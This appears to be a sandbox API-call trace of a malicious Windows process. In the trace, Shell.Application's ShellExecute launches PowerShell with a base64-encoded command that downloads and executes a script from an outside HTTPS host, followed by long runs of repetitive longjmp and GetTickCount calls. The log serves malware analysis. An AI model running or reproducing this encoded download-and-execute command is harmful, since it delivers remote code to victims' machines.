	[0088.568] IUnknown:Release (This=0x648a730) returned 0x1
	[0088.568] CLSIDFromProgIDEx (in: lpszProgID="shell.application", lpclsid=0x26c200 | out: lpclsid=0x26c200*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0088.569] SysStringLen (param_1=0x0) returned 0x0
	[0088.569] CoGetClassObject (in: rclsid=0x26c200*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x7fefe4b8d20) returned 0x0
	[0088.569] Shell:IUnknown:QueryInterface (in: This=0x7fefe4b8d20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26c1d8 | out: ppvObject=0x26c1d8*=0x0) returned 0x80004002
	[0088.569] Shell:IClassFactory:CreateInstance (in: This=0x7fefe4b8d20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1c0 | out: ppvObject=0x26c1c0*=0x6499da0) returned 0x0
	[0088.569] Shell:IUnknown:Release (This=0x7fefe4b8d20) returned 0x1
	[0088.569] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c198 | out: ppvObject=0x26c198*=0x6499de0) returned 0x0
	[0088.569] ??2@YAPEAX_K@Z () returned 0x42ef40
	[0088.569] Shell:IObjectWithSite:SetSite (This=0x6499de0, pUnkSite=0x42ef40) returned 0x0
	[0088.569] XMLHTTPRequest:IUnknown:AddRef (This=0x42ef40) returned 0x2
	[0088.569] Shell:IUnknown:Release (This=0x6499de0) returned 0x1
	[0088.569] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1a8 | out: ppvObject=0x26c1a8*=0x6499da0) returned 0x0
	[0088.569] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x3
	[0088.569] Shell:IUnknown:Release (This=0x6499da0) returned 0x2
	[0088.570] Shell:IUnknown:Release (This=0x6499da0) returned 0x1
	[0088.570] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x2
	[0088.570] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002
	[0088.570] Shell:IDispatch:GetIDsOfNames (in: This=0x6499da0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26c620*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x26c3d4 | out: rgDispId=0x26c3d4*=1610809345) returned 0x0
	[0088.577] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x2
	[0088.577] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c160 | out: ppvObject=0x26c160*=0x0) returned 0x80004002
	[0088.577] Shell:IDispatch:Invoke (in: This=0x6499da0, dispIdMember=1610809345, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180, puArgErr=0x26c150 | out: pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26c150*=0x0) returned 0x0
	[0088.667] Shell:IUnknown:Release (This=0x6499da0) returned 0x1
	[0088.668] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002
	[0088.668] Shell:IDispatch:GetIDsOfNames (in: This=0x6499da0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26c620*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x26c3d4 | out: rgDispId=0x26c3d4*=1610809345) returned 0x0
	[0088.668] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x2
	[0088.668] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c160 | out: ppvObject=0x26c160*=0x0) returned 0x80004002
	[0088.668] Shell:IDispatch:Invoke (in: This=0x6499da0, dispIdMember=1610809345, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180, puArgErr=0x26c150 | out: pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26c150*=0x0) returned 0x0
	[0088.772] Shell:IUnknown:Release (This=0x6499da0) returned 0x1
	[0088.772] XMLHTTPRequest:IUnknown:Release (This=0x42ef40) returned 0x0
	[0088.772] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0088.773] IUnknown:Release (This=0x3ea060) returned 0x0
	[0088.773] IUnknown:Release (This=0x648a520) returned 0x0
	[0088.773] ??3@YAXPEAX@Z () returned 0xa900020001
	[0088.773] ??3@YAXPEAX@Z () returned 0x7d002f0001
	[0088.773] free (_Block=0x404520) 
	[0088.775] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0088.775] ??3@YAXPEAX@Z () returned 0xaa00080001
	[0088.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0088.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0088.776] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0088.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0088.776] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0088.776] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0088.777] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0088.777] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0088.777] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0088.780] GetTickCount () returned 0x114d7aa
	[0088.780] longjmp () 
	[0088.781] longjmp () 
	[0088.781] longjmp () 
	[0088.781] GetCurrentThreadId () returned 0x9a8
	[0088.781] GetCurrentThreadId () returned 0x9a8
	[0088.781] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0088.781] malloc (_Size=0x80) returned 0x3c88b0
	[0088.782] longjmp () 
	[0088.782] longjmp () 
	[0088.782] longjmp () 
	[0088.782] longjmp () 
	[0088.782] longjmp () 
	[0088.782] longjmp () 
	[0088.783] longjmp () 
	[0088.783] longjmp () 
	[0088.783] longjmp () 
	[0088.783] longjmp () 
	[0088.783] longjmp () 
	[0088.784] longjmp () 
	[0088.784] longjmp () 
	[0088.784] longjmp () 
	[0088.784] longjmp () 
	[0088.784] longjmp () 
	[0088.784] longjmp () 
	[0088.785] longjmp () 
	[0088.785] longjmp () 
	[0088.785] longjmp () 
	[0088.785] longjmp () 
	[0088.785] longjmp () 
	[0088.785] longjmp () 
	[0088.786] longjmp () 
	[0088.786] longjmp () 
	[0088.786] longjmp () 
	[0088.786] longjmp () 
	[0088.786] longjmp () 
	[0088.786] longjmp () 
	[0088.786] GetTickCount () returned 0x114d7ba
	[0088.787] longjmp () 
	[0088.787] longjmp () 
	[0088.787] longjmp () 
	[0088.787] longjmp () 
	[0088.787] longjmp () 
	[0088.788] longjmp () 
	[0088.788] longjmp () 
	[0088.788] longjmp () 
	[0088.788] longjmp () 
	[0088.788] longjmp () 
	[0088.788] longjmp () 
	[0088.789] longjmp () 
	[0088.789] longjmp () 
	[0088.789] longjmp () 
	[0088.789] longjmp () 
	[0088.789] longjmp () 
	[0088.789] longjmp () 
	[0088.790] longjmp () 
	[0088.790] longjmp () 
	[0088.790] longjmp () 
	[0088.790] longjmp () 
	[0088.790] longjmp () 
	[0088.790] longjmp () 
	[0088.791] longjmp () 
	[0088.791] longjmp () 
	[0088.791] longjmp () 
	[0088.791] longjmp () 
	[0088.791] longjmp () 
	[0088.792] longjmp () 
	[0088.792] longjmp () 
	[0088.792] longjmp () 
	[0088.792] longjmp () 
	[0088.792] GetTickCount () returned 0x114d7ba
	[0088.792] longjmp () 
	[0088.792] longjmp () 
	[0088.793] longjmp () 
	[0088.793] longjmp () 
	[0088.793] longjmp () 
	[0088.793] longjmp () 
	[0088.793] longjmp () 
	[0088.793] longjmp () 
	[0088.794] longjmp () 
	[0088.794] longjmp () 
	[0088.794] longjmp () 
	[0088.794] longjmp () 
	[0088.794] longjmp () 
	[0088.794] longjmp () 
	[0088.795] longjmp () 
	[0088.795] longjmp () 
	[0088.795] longjmp () 
	[0088.795] longjmp () 
	[0088.795] longjmp () 
	[0088.795] longjmp () 
	[0088.796] longjmp () 
	[0088.796] longjmp () 
	[0088.796] longjmp () 
	[0088.796] longjmp () 
	[0088.796] longjmp () 
	[0088.797] longjmp () 
	[0088.797] longjmp () 
	[0088.797] longjmp () 
	[0088.797] longjmp () 
	[0088.797] longjmp () 
	[0088.797] longjmp () 
	[0088.798] longjmp () 
	[0088.798] GetTickCount () returned 0x114d7c9
	[0088.798] longjmp () 
	[0088.798] longjmp () 
	[0088.798] longjmp () 
	[0088.798] longjmp () 
	[0088.799] longjmp () 
	[0088.799] longjmp () 
	[0088.799] longjmp () 
	[0088.799] longjmp () 
	[0088.799] longjmp () 
	[0088.799] longjmp () 
	[0088.800] longjmp () 
	[0088.800] longjmp () 
	[0088.800] longjmp () 
	[0088.800] longjmp () 
	[0088.800] longjmp () 
	[0088.800] longjmp () 
	[0088.801] longjmp () 
	[0088.801] longjmp () 
	[0088.801] longjmp () 
	[0088.801] longjmp () 
	[0088.801] longjmp () 
	[0088.801] longjmp () 
	[0088.802] longjmp () 
	[0088.802] longjmp () 
	[0088.802] longjmp () 
	[0088.802] longjmp () 
	[0088.802] longjmp () 
	[0088.802] longjmp () 
	[0088.803] longjmp () 
	[0088.803] longjmp () 
	[0088.803] longjmp () 
	[0088.803] longjmp () 
	[0088.803] GetTickCount () returned 0x114d7c9
	[0088.803] longjmp () 
	[0088.804] longjmp () 
	[0088.804] longjmp () 
	[0088.804] longjmp () 
	[0088.804] longjmp () 
	[0088.804] longjmp () 
	[0088.804] longjmp () 
	[0088.805] longjmp () 
	[0088.805] longjmp () 
	[0088.805] longjmp () 
	[0088.805] longjmp () 
	[0088.805] longjmp () 
	[0088.805] longjmp () 
	[0088.806] longjmp () 
	[0088.806] longjmp () 
	[0088.806] longjmp () 
	[0088.806] longjmp () 
	[0088.806] longjmp () 
	[0088.806] longjmp () 
	[0088.807] longjmp () 
	[0088.807] longjmp () 
	[0088.807] longjmp () 
	[0088.807] longjmp () 
	[0088.807] longjmp () 
	[0088.807] longjmp () 
	[0088.808] longjmp () 
	[0088.808] longjmp () 
	[0088.808] longjmp () 
	[0088.808] longjmp () 
	[0088.808] longjmp () 
	[0088.808] longjmp () 
	[0088.809] longjmp () 
	[0088.809] GetTickCount () returned 0x114d7c9
	[0088.809] longjmp () 
	[0088.809] longjmp () 
	[0088.809] longjmp () 
	[0088.809] longjmp () 
	[0088.810] longjmp () 
	[0088.810] longjmp () 
	[0088.810] longjmp () 
	[0088.810] longjmp () 
	[0088.810] longjmp () 
	[0088.810] longjmp () 
	[0088.811] longjmp () 
	[0088.811] longjmp () 
	[0088.811] longjmp () 
	[0088.811] longjmp () 
	[0088.811] longjmp () 
	[0088.812] longjmp () 
	[0088.812] longjmp () 
	[0088.812] longjmp () 
	[0088.812] longjmp () 
	[0088.812] longjmp () 
	[0088.813] longjmp () 
	[0088.813] longjmp () 
	[0088.813] longjmp () 
	[0088.813] longjmp () 
	[0088.813] longjmp () 
	[0088.813] longjmp () 
	[0088.814] longjmp () 
	[0088.814] longjmp () 
	[0088.814] longjmp () 
	[0088.814] longjmp () 
	[0088.814] longjmp () 
	[0088.814] longjmp () 
	[0088.814] GetTickCount () returned 0x114d7d9
	[0088.815] longjmp () 
	[0088.815] longjmp () 
	[0088.815] longjmp () 
	[0088.815] longjmp () 
	[0088.815] longjmp () 
	[0088.816] longjmp () 
	[0088.816] longjmp () 
	[0088.816] longjmp () 
	[0088.816] longjmp () 
	[0088.816] longjmp () 
	[0088.816] longjmp () 
	[0088.816] longjmp () 
	[0088.817] longjmp () 
	[0088.817] longjmp () 
	[0088.817] longjmp () 
	[0088.817] longjmp () 
	[0088.817] longjmp () 
	[0088.818] longjmp () 
	[0088.818] longjmp () 
	[0088.818] longjmp () 
	[0088.818] longjmp () 
	[0088.818] longjmp () 
	[0088.818] longjmp () 
	[0088.819] longjmp () 
	[0088.819] longjmp () 
	[0088.819] longjmp () 
	[0088.819] longjmp () 
	[0088.819] longjmp () 
	[0088.819] longjmp () 
	[0088.820] longjmp () 
	[0088.820] longjmp () 
	[0088.820] longjmp () 
	[0088.820] GetTickCount () returned 0x114d7d9
	[0088.820] longjmp () 
	[0088.820] longjmp () 
	[0088.820] longjmp () 
	[0088.821] longjmp () 
	[0088.821] longjmp () 
	[0088.821] longjmp () 
	[0088.821] longjmp () 
	[0088.821] longjmp () 
	[0088.821] longjmp () 
	[0088.822] longjmp () 
	[0088.822] longjmp () 
	[0088.822] longjmp () 
	[0088.822] longjmp () 
	[0088.822] longjmp () 
	[0088.822] longjmp () 
	[0088.823] longjmp () 
	[0088.823] longjmp () 
	[0088.823] longjmp () 
	[0088.823] longjmp () 
	[0088.823] longjmp () 
	[0088.824] longjmp () 
	[0088.824] longjmp () 
	[0088.824] longjmp () 
	[0088.824] longjmp () 
	[0088.824] longjmp () 
	[0088.824] longjmp () 
	[0088.825] longjmp () 
	[0088.825] longjmp () 
	[0088.825] longjmp () 
	[0088.825] longjmp () 
	[0088.825] longjmp () 
	[0088.825] longjmp () 
	[0088.825] GetTickCount () returned 0x114d7d9
	[0088.826] longjmp () 
	[0088.826] longjmp () 
	[0088.826] longjmp () 
	[0088.826] longjmp () 
	[0088.826] longjmp () 
	[0088.826] longjmp () 
	[0088.827] longjmp () 
	[0088.827] longjmp () 
	[0088.827] longjmp () 
	[0088.827] longjmp () 
	[0088.827] longjmp () 
	[0088.828] longjmp () 
	[0088.828] longjmp () 
	[0088.828] longjmp () 
	[0088.828] longjmp () 
	[0088.828] longjmp () 
	[0088.828] longjmp () 
	[0088.829] longjmp () 
	[0088.829] longjmp () 
	[0088.829] longjmp () 
	[0088.829] longjmp () 
	[0088.829] longjmp () 
	[0088.829] longjmp () 
	[0088.830] longjmp () 
	[0088.830] longjmp () 
	[0088.830] longjmp () 
	[0088.830] longjmp () 
	[0088.830] longjmp () 
	[0088.830] longjmp () 
	[0088.831] longjmp () 
	[0088.831] longjmp () 
	[0088.831] longjmp () 
	[0088.831] GetTickCount () returned 0x114d7e8
	[0088.831] longjmp () 
	[0088.831] longjmp () 
	[0088.831] longjmp () 
	[0088.832] longjmp () 
	[0088.832] longjmp () 
	[0088.832] longjmp () 
	[0088.832] longjmp () 
	[0088.832] longjmp () 
	[0088.832] longjmp () 
	[0088.833] longjmp () 
	[0088.833] longjmp () 
	[0088.833] longjmp () 
	[0088.833] longjmp () 
	[0088.833] longjmp () 
	[0088.833] longjmp () 
	[0088.834] longjmp () 
	[0088.834] longjmp () 
	[0088.834] longjmp () 
	[0088.834] longjmp () 
	[0088.834] longjmp () 
	[0088.835] longjmp () 
	[0088.835] longjmp () 
	[0088.835] longjmp () 
	[0088.835] longjmp () 
	[0088.835] longjmp () 
	[0088.835] longjmp () 
	[0088.836] longjmp () 
	[0088.836] longjmp () 
	[0088.836] longjmp () 
	[0088.836] longjmp () 
	[0088.836] longjmp () 
	[0088.836] longjmp () 
	[0088.836] GetTickCount () returned 0x114d7e8
	[0088.837] longjmp () 
	[0088.837] longjmp () 
	[0088.837] longjmp () 
	[0088.837] longjmp () 
	[0088.837] longjmp () 
	[0088.838] longjmp () 
	[0088.838] longjmp () 
	[0088.838] longjmp () 
	[0088.838] longjmp () 
	[0088.838] longjmp () 
	[0088.838] longjmp () 
	[0088.838] longjmp () 
	[0088.839] longjmp () 
	[0088.839] longjmp () 
	[0088.839] longjmp () 
	[0088.839] longjmp () 
	[0088.839] longjmp () 
	[0088.840] longjmp () 
	[0088.840] longjmp () 
	[0088.840] longjmp () 
	[0088.840] longjmp () 
	[0088.840] longjmp () 
	[0088.840] longjmp () 
	[0088.840] longjmp () 
	[0088.841] longjmp () 
	[0088.841] longjmp () 
	[0088.841] longjmp () 
	[0088.841] longjmp () 
	[0088.841] longjmp () 
	[0088.841] longjmp () 
	[0088.842] longjmp () 
	[0088.842] longjmp () 
	[0088.842] GetTickCount () returned 0x114d7e8
	[0088.842] longjmp () 
	[0088.842] longjmp () 
	[0088.842] longjmp () 
	[0088.842] longjmp () 
	[0088.842] longjmp () 
	[0088.844] longjmp () 
	[0088.844] longjmp () 
	[0088.844] longjmp () 
	[0088.845] longjmp () 
	[0088.845] longjmp () 
	[0088.845] longjmp () 
	[0088.845] longjmp () 
	[0088.845] longjmp () 
	[0088.845] longjmp () 
	[0088.846] longjmp () 
	[0088.846] longjmp () 
	[0088.846] longjmp () 
	[0088.846] longjmp () 
	[0088.846] longjmp () 
	[0088.846] longjmp () 
	[0088.846] longjmp () 
	[0088.847] longjmp () 
	[0088.847] longjmp () 
	[0088.847] longjmp () 
	[0088.847] longjmp () 
	[0088.847] longjmp () 
	[0088.847] longjmp () 
	[0088.847] longjmp () 
	[0088.848] longjmp () 
	[0088.848] longjmp () 
	[0088.848] longjmp () 
	[0088.848] longjmp () 
	[0088.848] GetTickCount () returned 0x114d7f8
	[0088.848] longjmp () 
	[0088.848] longjmp () 
	[0088.849] longjmp () 
	[0088.849] longjmp () 
	[0088.849] longjmp () 
	[0088.849] longjmp () 
	[0088.849] longjmp () 
	[0088.849] longjmp () 
	[0088.849] longjmp () 
	[0088.850] longjmp () 
	[0088.850] longjmp () 
	[0088.850] longjmp () 
	[0088.850] longjmp () 
	[0088.850] longjmp () 
	[0088.850] longjmp () 
	[0088.850] longjmp () 
	[0088.851] longjmp () 
	[0088.851] longjmp () 
	[0088.851] longjmp () 
	[0088.851] longjmp () 
	[0088.851] longjmp () 
	[0088.851] longjmp () 
	[0088.852] longjmp () 
	[0088.852] longjmp () 
	[0088.852] longjmp () 
	[0088.852] longjmp () 
	[0088.852] longjmp () 
	[0088.852] longjmp () 
	[0088.852] longjmp () 
	[0088.853] longjmp () 
	[0088.853] longjmp () 
	[0088.853] longjmp () 
